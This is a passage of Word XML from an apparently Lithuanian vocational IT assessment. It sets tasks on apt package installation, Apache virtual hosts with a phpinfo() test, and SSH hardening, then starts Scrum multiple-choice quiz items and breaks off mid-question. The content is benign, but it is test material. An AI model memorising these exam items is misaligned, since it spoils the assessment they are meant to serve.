    <w:p w:rsidR="009D6E00" w:rsidRDefault="00761BAA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Su apt-cache įrankiu suraskite programinį paketą xcowsay.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. Su apt-get įrankių įdiekite paketą į sistemą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3. Naudojant APT įrankį (GUI arba komandinės eilutės) įdiekite programą figlet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4. Išbandykite programų veikimą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5. Nueikite į https://launchpad.net ir suraskite „Oracle Java (JDK) 7 / 8 / 9 Installer PPA“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6. Pridėkite prie sistemos PPA: webupd8team/java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7. Įdiekite į sistemą programinius paketus: eclipse, oracle-java8-installer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Toc10443983"/>
      <w:bookmarkStart w:id="192" w:name="_Toc13095532"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="193" w:name="_Toc13833426"/>
      <w:bookmarkStart w:id="194" w:name="_Toc14392457"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. Naudoti </w:t>
      </w:r>
      <w:r w:rsidRPr="00850D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> serverio programinę įrangą HTTP bylų viešinimui</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
      <w:bookmarkEnd w:id="192"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
      <w:bookmarkEnd w:id="194"/>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WEB SERVERIO DIEGIMAS IR KONFIGŪRAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: naudojant komandų eilutę įdiegti ir sukonfigūruoti WEB serverį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): komandų eilutė.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paruoškie WEB serverį darbui:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001C399A" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB1652">
        <w:t>Įdiekite WEB serverį Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001C399A" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB1652">
        <w:t>Paleiskite WEB serverį Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001C399A" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB1652">
        <w:t>Patikrinkite jo veikimą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001C399A" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB1652">
        <w:t>Jei reikia, WEB serverį sukonfigūruokite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="792" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sukonfigūruokite WEB serverį taip, kad jis galėtų talpinti 2 svetaines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000A6814" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00232381">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1-ma svetainė: linux.org. Svetainė turi talpinti tekstą: „Sveiki aš esu Linux OS!“ ir turėti nuorodą į svetainę windows.org (index.html – naudojame tik HTML ir CSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E868B8" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.2.</w:t>
      </w:r>
      <w:r w:rsidR="00AB5E95">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2-ra svetainė: windows.org. Svetainė turi talpinti tekstą: „Sveiki aš esu Windows OS!“ ir turėti nuorodą į svetainę linux.org (index.html – naudojame tik HTML ir CSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paleiskite abi svetaines ir patikrinkite jų veikimą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įjungite savo WEB serveryje PHP palaikymą, parašykite trumpą php testą (&lt;?php phpinfo();?&gt;) ir patikrinkite ar PHP palaikymas veikia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc10443984"/>
      <w:bookmarkStart w:id="196" w:name="_Toc13095533"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="197" w:name="_Toc13833427"/>
      <w:bookmarkStart w:id="198" w:name="_Toc14392458"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Valdyti tarnybines stotis per nuotolinę prieigą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
      <w:bookmarkEnd w:id="196"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68"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NUOTOLINIS PRISIJUNGIMAS PRIE LINUX OS</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA: naudojant putty įrankį atlikti nuotolinį serverio valdymą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudojamos priemonės (aplinkos): Windows 7, Xubuntu OS, putty arba kitty.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Veiksmų eiga (žingsniai), kaip bus siekiama rezultato: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. Diegiame Xubuntu OS openssh serverį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. Sukonfigūruojame SSH serverį, kad jis veiktų ant 15000 prievado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3. SSH serverio konfigūracijoje uždraudžiame root vartotojo prisijungimą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4. Iš Windows 7, naudojant putty įrankį prisijungiame prie savo virtualios Xubuntu OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Toc10443985"/>
      <w:bookmarkStart w:id="200" w:name="_Toc13095534"/>
      <w:bookmarkStart w:id="201" w:name="_Toc13833428"/>
      <w:bookmarkStart w:id="202" w:name="_Toc14392459"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2. Kompetencija. Taikyti aktualias programinės įrangos kūrimo metodikas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
      <w:bookmarkEnd w:id="200"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Šioje dalyje pateikiamos užduotys skirtos žinioms, suvokimui ir gebėjimui analizuoti programinės įrangos kūrimo procesą patikrinti. Dėl ribotos Scrum terminologijos lietuvių k. ir geresnio įsisavinimo dalis klausimų ir terminų pateikiami naudojant originalias sąvokas ar frazes anglų k.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="720" w:right="282" w:hanging="720"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Toc10443986"/>
      <w:bookmarkStart w:id="204" w:name="_Toc13095535"/>
      <w:bookmarkStart w:id="205" w:name="_Toc13833429"/>
      <w:bookmarkStart w:id="206" w:name="_Toc14392460"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.  Mok</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ymosi rezultatas. Suprasti Scrum proceso elementus</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir komandos narių atsakomybes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
      <w:bookmarkEnd w:id="204"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>
      <w:bookmarkEnd w:id="206"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1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AS YRA SPRINTO ĮSIPAREIGOJIMŲ SAVININKAS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1091" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId50" w:name="DefaultOcxName27" w:shapeid="_x0000_i1091"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Atskiri komandos nariai, paskirti Scrum meistro (ScrumMaster)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1094" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId51" w:name="DefaultOcxName271" w:shapeid="_x0000_i1094"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="207" w:name="_Hlk13089818"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Visa komanda kartu</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="207"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:object w:dxaOrig="225" w:dyaOrig="225">
          <v:shape id="_x0000_i1097" type="#_x0000_t75" style="width:20.25pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId49" o:title=""/>
          </v:shape>
          <w:control r:id="rId52" w:name="DefaultOcxName26" w:shapeid="_x0000_i1097"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t> Scrum meistras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="238" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
